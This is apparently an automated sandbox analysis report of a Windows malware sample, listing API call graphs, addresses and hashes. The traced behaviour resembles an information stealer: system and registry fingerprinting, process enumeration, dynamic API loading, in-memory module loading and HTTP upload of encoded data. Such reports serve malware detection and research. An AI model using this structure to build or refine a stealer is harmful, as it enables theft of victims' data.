c41ff8 15056->15057 15681 c47d80 GetSystemPowerStatus 15057->15681 15060 c4a9b0 4 API calls 15061 c42018 15060->15061 15062 c4a8a0 lstrcpy 15061->15062 15063 c42021 15062->15063 15064 c4a9b0 4 API calls 15063->15064 15065 c42040 15064->15065 15066 c4a8a0 lstrcpy 15065->15066 15067 c42049 15066->15067 15068 c4a9b0 4 API calls 15067->15068 15069 c4206a 15068->15069 15070 c4a8a0 lstrcpy 15069->15070 15071 c42073 15070->15071 15072 c4207e GetCurrentProcessId 15071->15072 15683 c49470 OpenProcess 15072->15683 15075 c4a920 3 API calls 15076 c420a4 15075->15076 15077 c4a8a0 lstrcpy 15076->15077 15078 c420ad 15077->15078 15079 c4a9b0 4 API calls 15078->15079 15080 c420d7 15079->15080 15081 c4a8a0 lstrcpy 15080->15081 15082 c420e0 15081->15082 15083 c4a9b0 4 API calls 15082->15083 15084 c42100 15083->15084 15085 c4a8a0 lstrcpy 15084->15085 15086 c42109 15085->15086 15688 c47e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15086->15688 15089 c4a9b0 4 API calls 15090 c42129 15089->15090 15091 c4a8a0 lstrcpy 15090->15091 15092 c42132 15091->15092 15093 c4a9b0 4 API calls 15092->15093 15094 c42151 15093->15094 15095 c4a8a0 lstrcpy 15094->15095 15096 c4215a 15095->15096 15097 c4a9b0 4 API calls 15096->15097 15098 c4217b 15097->15098 15099 c4a8a0 lstrcpy 15098->15099 15100 c42184 15099->15100 15692 c47f60 15100->15692 15103 c4a9b0 4 API calls 15104 c421a4 15103->15104 15105 c4a8a0 lstrcpy 15104->15105 15106 c421ad 15105->15106 15107 c4a9b0 4 API calls 15106->15107 15108 c421cc 15107->15108 15109 c4a8a0 lstrcpy 15108->15109 15110 c421d5 15109->15110 15111 c4a9b0 4 API calls 15110->15111 15112 c421f6 15111->15112 15113 c4a8a0 lstrcpy 15112->15113 15114 c421ff 15113->15114 15705 c47ed0 GetSystemInfo wsprintfA 15114->15705 15117 c4a9b0 4 API calls 15118 c4221f 15117->15118 15119 c4a8a0 lstrcpy 15118->15119 15120 c42228 15119->15120 15121 c4a9b0 4 API calls 15120->15121 15122 c42247 15121->15122 15123 c4a8a0 lstrcpy 15122->15123 15124 c42250 15123->15124 15125 c4a9b0 4 API calls 15124->15125 15126 c42270 15125->15126 15127 c4a8a0 lstrcpy 15126->15127 15128 c42279 15127->15128 15707 c48100 GetProcessHeap RtlAllocateHeap 15128->15707 15131 c4a9b0 4 API calls 15132 c42299 15131->15132 15133 c4a8a0 lstrcpy 15132->15133 15134 c422a2 15133->15134 15135 c4a9b0 4 API calls 15134->15135 15136 c422c1 15135->15136 15137 c4a8a0 lstrcpy 15136->15137 15138 c422ca 15137->15138 15139 c4a9b0 4 API calls 15138->15139 15140 c422eb 15139->15140 15141 c4a8a0 lstrcpy 15140->15141 15142 c422f4 15141->15142 15713 c487c0 15142->15713 15145 c4a920 3 API calls 15146 c4231e 15145->15146 15147 c4a8a0 lstrcpy 15146->15147 15148 c42327 15147->15148 15149 c4a9b0 4 API calls 15148->15149 15150 c42351 15149->15150 15151 c4a8a0 lstrcpy 15150->15151 15152 c4235a 15151->15152 15153 c4a9b0 4 API calls 15152->15153 15154 c4237a 15153->15154 15155 c4a8a0 lstrcpy 15154->15155 15156 c42383 15155->15156 15157 c4a9b0 4 API calls 15156->15157 15158 c423a2 15157->15158 15159 c4a8a0 lstrcpy 15158->15159 15160 c423ab 15159->15160 15718 c481f0 15160->15718 15162 c423c2 15163 c4a920 3 API calls 15162->15163 15164 c423d5 15163->15164 15165 c4a8a0 lstrcpy 15164->15165 15166 c423de 15165->15166 15167 c4a9b0 4 API calls 15166->15167 15168 c4240a 15167->15168 15169 c4a8a0 lstrcpy 15168->15169 15170 c42413 15169->15170 15171 c4a9b0 4 API calls 15170->15171 15172 c42432 15171->15172 15173 c4a8a0 lstrcpy 15172->15173 15174 c4243b 15173->15174 15175 c4a9b0 4 API calls 15174->15175 15176 c4245c 15175->15176 15177 c4a8a0 lstrcpy 15176->15177 15178 c42465 15177->15178 15179 c4a9b0 4 API calls 15178->15179 15180 c42484 15179->15180 15181 c4a8a0 lstrcpy 15180->15181 15182 c4248d 15181->15182 15183 c4a9b0 4 API calls 15182->15183 15184 c424ae 15183->15184 15185 c4a8a0 lstrcpy 15184->15185 15186 c424b7 15185->15186 15726 c48320 15186->15726 15188 c424d3 15189 c4a920 3 API calls 15188->15189 15190 c424e6 15189->15190 15191 c4a8a0 lstrcpy 15190->15191 15192 c424ef 15191->15192 15193 c4a9b0 4 API calls 15192->15193 15194 c42519 15193->15194 15195 c4a8a0 lstrcpy 15194->15195 15196 c42522 15195->15196 15197 c4a9b0 4 API calls 15196->15197 15198 c42543 15197->15198 15199 c4a8a0 lstrcpy 15198->15199 15200 c4254c 15199->15200 15201 c48320 17 API calls 15200->15201 15202 c42568 15201->15202 15203 c4a920 3 API calls 15202->15203 15204 c4257b 15203->15204 15205 c4a8a0 lstrcpy 15204->15205 15206 c42584 15205->15206 15207 c4a9b0 4 API calls 15206->15207 15208 c425ae 15207->15208 15209 c4a8a0 lstrcpy 15208->15209 15210 c425b7 15209->15210 15211 c4a9b0 4 API calls 15210->15211 15212 c425d6 15211->15212 15213 c4a8a0 lstrcpy 15212->15213 15214 c425df 15213->15214 15215 c4a9b0 4 API calls 15214->15215 15216 c42600 15215->15216 15217 c4a8a0 lstrcpy 15216->15217 15218 c42609 15217->15218 15762 c48680 15218->15762 15220 c42620 15221 c4a920 3 API calls 15220->15221 15222 c42633 15221->15222 15223 c4a8a0 lstrcpy 15222->15223 15224 c4263c 15223->15224 15225 c4265a lstrlen 15224->15225 15226 c4266a 15225->15226 15227 c4a740 lstrcpy 15226->15227 15228 c4267c 15227->15228 15229 c31590 lstrcpy 15228->15229 15230 c4268d 15229->15230 15772 c45190 15230->15772 15232 c42699 15232->13663 15960 c4aad0 15233->15960 15235 c35009 InternetOpenUrlA 15239 c35021 15235->15239 15236 c350a0 InternetCloseHandle InternetCloseHandle 15238 c350ec 15236->15238 15237 c3502a InternetReadFile 15237->15239 15238->13667 15239->15236 15239->15237 15961 c398d0 15240->15961 15242 c40759 15243 c4077d 15242->15243 15244 c40a38 15242->15244 15247 c40799 StrCmpCA 15243->15247 15245 c31590 lstrcpy 15244->15245 15246 c40a49 15245->15246 16137 c40250 15246->16137 15249 c407a8 15247->15249 15250 c40843 15247->15250 15252 c4a7a0 lstrcpy 15249->15252 15253 c40865 StrCmpCA 15250->15253 15254 c407c3 15252->15254 15255 c40874 15253->15255 15292 c4096b 15253->15292 15256 c31590 lstrcpy 15254->15256 15257 c4a740 lstrcpy 15255->15257 15258 c4080c 15256->15258 15260 c40881 15257->15260 15261 c4a7a0 lstrcpy 15258->15261 15259 c4099c StrCmpCA 15262 c40a2d 15259->15262 15263 c409ab 15259->15263 15264 c4a9b0 4 API calls 15260->15264 15265 c40823 15261->15265 15262->13671 15266 c31590 lstrcpy 15263->15266 15267 c408ac 15264->15267 15268 c4a7a0 lstrcpy 15265->15268 15269 c409f4 15266->15269 15270 c4a920 3 API calls 15267->15270 15271 c4083e 15268->15271 15273 c4a7a0 lstrcpy 15269->15273 15274 c408b3 15270->15274 15964 c3fb00 15271->15964 15275 c40a0d 15273->15275 15276 c4a9b0 4 API calls 15274->15276 15277 c4a7a0 lstrcpy 15275->15277 15278 c408ba 15276->15278 15279 c40a28 15277->15279 15292->15259 15612 c4a7a0 lstrcpy 15611->15612 15613 c31683 15612->15613 15614 c4a7a0 lstrcpy 15613->15614 15615 c31695 15614->15615 15616 c4a7a0 lstrcpy 15615->15616 15617 c316a7 15616->15617 15618 c4a7a0 lstrcpy 15617->15618 15619 c315a3 15618->15619 15619->14494 15621 c347c6 15620->15621 15622 c34838 lstrlen 15621->15622 15646 c4aad0 15622->15646 15624 c34848 InternetCrackUrlA 15625 c34867 15624->15625 15625->14571 15627 c34eee 15626->15627 15628 c39af9 LocalAlloc 15626->15628 15627->14593 15627->14596 15628->15627 15629 c39b14 CryptStringToBinaryA 15628->15629 15629->15627 15630 c39b39 LocalFree 15629->15630 15630->15627 15632 c4a740 lstrcpy 15631->15632 15633 c48b74 15632->15633 15634 c4a740 lstrcpy 15633->15634 15635 c48b82 GetSystemTime 15634->15635 15636 c48b99 15635->15636 15637 c4a7a0 lstrcpy 15636->15637 15638 c48bfc 15637->15638 15638->14587 15640 c4a931 15639->15640 15641 c4a988 15640->15641 15643 c4a968 lstrcpy lstrcat 15640->15643 15642 c4a7a0 lstrcpy 15641->15642 15644 c4a994 15642->15644 15643->15641 15644->14590 15645->14705 15646->15624 15647->14715 15648->14856 15649->14858 15650->14866 15779 c477a0 15651->15779 15654 c476c6 RegOpenKeyExA 15656 c47704 RegCloseKey 15654->15656 15657 c476e7 RegQueryValueExA 15654->15657 15655 c41c1e 15655->14948 15656->15655 15657->15656 15659 c41c99 15658->15659 15659->14962 15661 c41e09 15660->15661 15661->15004 15663 c47a9a wsprintfA 15662->15663 15664 c41e84 15662->15664 15663->15664 15664->15018 15666 c41efe 15665->15666 15667 c47b4d 15665->15667 15666->15032 15786 c48d20 LocalAlloc CharToOemW 15667->15786 15670 c4a740 lstrcpy 15669->15670 15671 c47bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15670->15671 15680 c47c25 15671->15680 15672 c47c46 GetLocaleInfoA 15672->15680 15673 c47d18 15674 c47d1e LocalFree 15673->15674 15675 c47d28 15673->15675 15674->15675 15677 c4a7a0 lstrcpy 15675->15677 15676 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15676->15680 15679 c47d37 15677->15679 15678 c4a8a0 lstrcpy 15678->15680 15679->15045 15680->15672 15680->15673 15680->15676 15680->15678 15682 c42008 15681->15682 15682->15060 15684 c494b5 15683->15684 15685 c49493 GetModuleFileNameExA CloseHandle 15683->15685 15686 c4a740 lstrcpy 15684->15686 15685->15684 15687 c42091 15686->15687 15687->15075 15689 c42119 15688->15689 15690 c47e68 RegQueryValueExA 15688->15690 15689->15089 15691 c47e8e RegCloseKey 15690->15691 15691->15689 15693 c47fb9 GetLogicalProcessorInformationEx 15692->15693 15694 c47fd8 GetLastError 15693->15694 15696 c48029 15693->15696 15700 c47fe3 15694->15700 15704 c48022 15694->15704 15699 c489f0 2 API calls 15696->15699 15698 c489f0 2 API calls 15701 c42194 15698->15701 15702 c4807b 15699->15702 15700->15693 15700->15701 15787 c489f0 15700->15787 15790 c48a10 GetProcessHeap RtlAllocateHeap 15700->15790 15701->15103 15703 c48084 wsprintfA 15702->15703 15702->15704 15703->15701 15704->15698 15704->15701 15706 c4220f 15705->15706 15706->15117 15708 c489b0 15707->15708 15709 c4814d GlobalMemoryStatusEx 15708->15709 15710 c48163 __aulldiv 15709->15710 15711 c4819b wsprintfA 15710->15711 15712 c42289 15711->15712 15712->15131 15714 c487fb GetProcessHeap RtlAllocateHeap wsprintfA 15713->15714 15716 c4a740 lstrcpy 15714->15716 15717 c4230b 15716->15717 15717->15145 15719 c4a740 lstrcpy 15718->15719 15723 c48229 15719->15723 15720 c48263 15722 c4a7a0 lstrcpy 15720->15722 15721 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15721->15723 15724 c482dc 15722->15724 15723->15720 15723->15721 15725 c4a8a0 lstrcpy 15723->15725 15724->15162 15725->15723 15727 c4a740 lstrcpy 15726->15727 15728 c4835c RegOpenKeyExA 15727->15728 15729 c483ae 15728->15729 15731 c483d0 15728->15731 15730 c4a7a0 lstrcpy 15729->15730 15742 c483bd 15730->15742 15732 c48613 RegCloseKey 15731->15732 15733 c483f8 RegEnumKeyExA 15731->15733 15734 c4a7a0 lstrcpy 15732->15734 15735 c4860e 15733->15735 15736 c4843f wsprintfA RegOpenKeyExA 15733->15736 15734->15742 15735->15732 15737 c48485 RegCloseKey RegCloseKey 15736->15737 15738 c484c1 RegQueryValueExA 15736->15738 15739 c4a7a0 lstrcpy 15737->15739 15740 c48601 RegCloseKey 15738->15740 15741 c484fa lstrlen 15738->15741 15739->15742 15740->15735 15741->15740 15743 c48510 15741->15743 15742->15188 15744 c4a9b0 4 API calls 15743->15744 15745 c48527 15744->15745 15746 c4a8a0 lstrcpy 15745->15746 15747 c48533 15746->15747 15748 c4a9b0 4 API calls 15747->15748 15749 c48557 15748->15749 15750 c4a8a0 lstrcpy 15749->15750 15751 c48563 15750->15751 15752 c4856e RegQueryValueExA 15751->15752 15752->15740 15753 c485a3 15752->15753 15754 c4a9b0 4 API calls 15753->15754 15755 c485ba 15754->15755 15756 c4a8a0 lstrcpy 15755->15756 15757 c485c6 15756->15757 15758 c4a9b0 4 API calls 15757->15758 15759 c485ea 15758->15759 15760 c4a8a0 lstrcpy 15759->15760 15761 c485f6 15760->15761 15761->15740 15763 c4a740 lstrcpy 15762->15763 15764 c486bc CreateToolhelp32Snapshot Process32First 15763->15764 15765 c4875d CloseHandle 15764->15765 15766 c486e8 Process32Next 15764->15766 15767 c4a7a0 lstrcpy 15765->15767 15766->15765 15768 c486fd 15766->15768 15769 c48776 15767->15769 15768->15766 15770 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15768->15770 15771 c4a8a0 lstrcpy 15768->15771 15769->15220 15770->15768 15771->15768 15773 c4a7a0 lstrcpy 15772->15773 15774 c451b5 15773->15774 15775 c31590 lstrcpy 15774->15775 15776 c451c6 15775->15776 15791 c35100 15776->15791 15778 c451cf 15778->15232 15782 c47720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15779->15782 15781 c476b9 15781->15654 15781->15655 15783 c47765 RegQueryValueExA 15782->15783 15784 c47780 RegCloseKey 15782->15784 15783->15784 15785 c47793 15784->15785 15785->15781 15786->15666 15788 c48a0c 15787->15788 15789 c489f9 GetProcessHeap HeapFree 15787->15789 15788->15700 15789->15788 15790->15700 15792 c4a7a0 lstrcpy 15791->15792 15793 c35119 15792->15793 15794 c347b0 2 API calls 15793->15794 15795 c35125 15794->15795 15951 c48ea0 15795->15951 15797 c35184 15798 c35192 lstrlen 15797->15798 15799 c351a5 15798->15799 15800 c48ea0 4 API calls 15799->15800 15801 c351b6 15800->15801 15802 c4a740 lstrcpy 15801->15802 15803 c351c9 15802->15803 15804 c4a740 lstrcpy 15803->15804 15805 c351d6 15804->15805 15806 c4a740 lstrcpy 15805->15806 15807 c351e3 15806->15807 15808 c4a740 lstrcpy 15807->15808 15809 c351f0 15808->15809 15810 c4a740 lstrcpy 15809->15810 15811 c351fd InternetOpenA StrCmpCA 15810->15811 15812 c3522f 15811->15812 15813 c358c4 InternetCloseHandle 15812->15813 15814 c48b60 3 API calls 15812->15814 15820 c358d9 codecvt 15813->15820 15815 c3524e 15814->15815 15816 c4a920 3 API calls 15815->15816 15817 c35261 15816->15817 15818 c4a8a0 lstrcpy 15817->15818 15819 c3526a 15818->15819 15821 c4a9b0 4 API calls 15819->15821 15824 c4a7a0 lstrcpy 15820->15824 15822 c352ab 15821->15822 15823 c4a920 3 API calls 15822->15823 15825 c352b2 15823->15825 15831 c35913 15824->15831 15826 c4a9b0 4 API calls 15825->15826 15827 c352b9 15826->15827 15828 c4a8a0 lstrcpy 15827->15828 15829 c352c2 15828->15829 15830 c4a9b0 4 API calls 15829->15830 15832 c35303 15830->15832 15831->15778 15833 c4a920 3 API calls 15832->15833 15834 c3530a 15833->15834 15835 c4a8a0 lstrcpy 15834->15835 15836 c35313 15835->15836 15837 c35329 InternetConnectA 15836->15837 15837->15813 15838 c35359 HttpOpenRequestA 15837->15838 15840 c358b7 InternetCloseHandle 15838->15840 15841 c353b7 15838->15841 15840->15813 15842 c4a9b0 4 API calls 15841->15842 15843 c353cb 15842->15843 15844 c4a8a0 lstrcpy 15843->15844 15845 c353d4 15844->15845 15846 c4a920 3 API calls 15845->15846 15847 c353f2 15846->15847 15848 c4a8a0 lstrcpy 15847->15848 15849 c353fb 15848->15849 15850 c4a9b0 4 API calls 15849->15850 15851 c3541a 15850->15851 15852 c4a8a0 lstrcpy 15851->15852 15853 c35423 15852->15853 15854 c4a9b0 4 API calls 15853->15854 15855 c35444 15854->15855 15856 c4a8a0 lstrcpy 15855->15856 15857 c3544d 15856->15857 15858 c4a9b0 4 API calls 15857->15858 15859 c3546e 15858->15859 15860 c4a8a0 lstrcpy 15859->15860 15952 c48ead CryptBinaryToStringA 15951->15952 15956 c48ea9 15951->15956 15953 c48ece GetProcessHeap RtlAllocateHeap 15952->15953 15952->15956 15954 c48ef4 codecvt 15953->15954 15953->15956 15955 c48f05 CryptBinaryToStringA 15954->15955 15955->15956 15956->15797 15960->15235 16203 c39880 15961->16203 15963 c398e1 15963->15242 15965 c4a740 lstrcpy 15964->15965 16138 c4a740 lstrcpy 16137->16138 16139 c40266 16138->16139 16140 c48de0 2 API calls 16139->16140 16141 c4027b 16140->16141 16142 c4a920 3 API calls 16141->16142 16143 c4028b 16142->16143 16144 c4a8a0 lstrcpy 16143->16144 16145 c40294 16144->16145 16146 c4a9b0 4 API calls 16145->16146 16147 c402b8 16146->16147 16204 c3988d 16203->16204 16207 c36fb0 16204->16207 16206 c398ad codecvt 16206->15963 16210 c36d40 16207->16210 16211 c36d63 16210->16211 16220 c36d59 16210->16220 16226 c36530 16211->16226 16215 c36dbe 16215->16220 16236 c369b0 16215->16236 16217 c36e2a 16218 c36ee6 VirtualFree 16217->16218 16217->16220 16221 c36ef7 16217->16221 16218->16221 16219 c36f41 16219->16220 16222 c489f0 2 API calls 16219->16222 16220->16206 16221->16219 16223 c36f26 FreeLibrary 16221->16223 16224 c36f38 16221->16224 16222->16220 16223->16221 16225 c489f0 2 API calls 16224->16225 16225->16219 16227 c36542 16226->16227 16229 c36549 16227->16229 16246 c48a10 GetProcessHeap RtlAllocateHeap 16227->16246 16229->16220 16230 c36660 16229->16230 16235 c3668f VirtualAlloc 16230->16235 16232 c36730 16233 c36743 VirtualAlloc 16232->16233 16234 c3673c 16232->16234 16233->16234 16234->16215 16235->16232 16235->16234 16237 c369c9 16236->16237 16240 c369d5 16236->16240 16238 c36a09 LoadLibraryA 16237->16238 16237->16240 16239 c36a32 16238->16239 16238->16240 16243 c36ae0 16239->16243 16247 c48a10 GetProcessHeap RtlAllocateHeap 16239->16247 16240->16217 16242 c36ba8 GetProcAddress 16242->16240 16242->16243 16243->16240 16243->16242 16244 c489f0 2 API calls 16244->16243 16245 c36a8b 16245->16240 16245->16244 16246->16229 16247->16245

                                Executed Functions

                                Function 00C49860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 c49860-c49874 call c49750 663 c49a93-c49af2 LoadLibraryA * 5 660->663 664 c4987a-c49a8e call c49780 GetProcAddress * 21 660->664 665 c49af4-c49b08 GetProcAddress 663->665 666 c49b0d-c49b14 663->666 664->663 665->666 668 c49b46-c49b4d 666->668 669 c49b16-c49b41 GetProcAddress * 2 666->669 671 c49b4f-c49b63 GetProcAddress 668->671 672 c49b68-c49b6f 668->672 669->668 671->672 673 c49b71-c49b84 GetProcAddress 672->673 674 c49b89-c49b90 672->674 673->674 675 c49bc1-c49bc2 674->675 676 c49b92-c49bbc GetProcAddress * 2 674->676 676->675
                                APIs
                                • GetProcAddress.KERNEL32(77190000,019F1750), ref: 00C498A1
                                • GetProcAddress.KERNEL32(77190000,019F1768), ref: 00C498BA
                                • GetProcAddress.KERNEL32(77190000,019F1600), ref: 00C498D2
                                • GetProcAddress.KERNEL32(77190000,019F1780), ref: 00C498EA
                                • GetProcAddress.KERNEL32(77190000,019F15A0), ref: 00C49903
                                • GetProcAddress.KERNEL32(77190000,019F8AB8), ref: 00C4991B
                                • GetProcAddress.KERNEL32(77190000,019E52E8), ref: 00C49933
                                • GetProcAddress.KERNEL32(77190000,019E5228), ref: 00C4994C
                                • GetProcAddress.KERNEL32(77190000,019F15E8), ref: 00C49964
                                • GetProcAddress.KERNEL32(77190000,019F17C8), ref: 00C4997C
                                • GetProcAddress.KERNEL32(77190000,019F1630), ref: 00C49995
                                • GetProcAddress.KERNEL32(77190000,019F1660), ref: 00C499AD
                                • GetProcAddress.KERNEL32(77190000,019E5368), ref: 00C499C5
                                • GetProcAddress.KERNEL32(77190000,019F1690), ref: 00C499DE
                                • GetProcAddress.KERNEL32(77190000,019F16A8), ref: 00C499F6
                                • GetProcAddress.KERNEL32(77190000,019E4FA8), ref: 00C49A0E
                                • GetProcAddress.KERNEL32(77190000,019F1798), ref: 00C49A27
                                • GetProcAddress.KERNEL32(77190000,019F17B0), ref: 00C49A3F
                                • GetProcAddress.KERNEL32(77190000,019E4FE8), ref: 00C49A57
                                • GetProcAddress.KERNEL32(77190000,019F17F8), ref: 00C49A70
                                • GetProcAddress.KERNEL32(77190000,019E4FC8), ref: 00C49A88
                                • LoadLibraryA.KERNEL32(019F1828,?,00C46A00), ref: 00C49A9A
                                • LoadLibraryA.KERNEL32(019F1858,?,00C46A00), ref: 00C49AAB
                                • LoadLibraryA.KERNEL32(019F1870,?,00C46A00), ref: 00C49ABD
                                • LoadLibraryA.KERNEL32(019F1840,?,00C46A00), ref: 00C49ACF
                                • LoadLibraryA.KERNEL32(019F1810,?,00C46A00), ref: 00C49AE0
                                • GetProcAddress.KERNEL32(76850000,019F1888), ref: 00C49B02
                                • GetProcAddress.KERNEL32(77040000,019F18A0), ref: 00C49B23
                                • GetProcAddress.KERNEL32(77040000,019F18B8), ref: 00C49B3B
                                • GetProcAddress.KERNEL32(75A10000,019F8D20), ref: 00C49B5D
                                • GetProcAddress.KERNEL32(75690000,019E52A8), ref: 00C49B7E
                                • GetProcAddress.KERNEL32(776F0000,019F8B88), ref: 00C49B9F
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00C49BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00C49BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                • Instruction ID: 0fec3c8004f8742d7dd9d43a0fb422571a8d4c4f69c04d382e594feaa8c301ce
                                • Opcode Fuzzy Hash: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                • Instruction Fuzzy Hash: 7AA15AB55042419FE348EFAAFD8996E37F9F7C820170C453AE61DA3264D63998C9CB13
                                Function 00C345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 c345c0-c34695 RtlAllocateHeap 781 c346a0-c346a6 764->781 782 c3474f-c347a9 VirtualProtect 781->782 783 c346ac-c3474a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C3460E
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C3479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34617
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
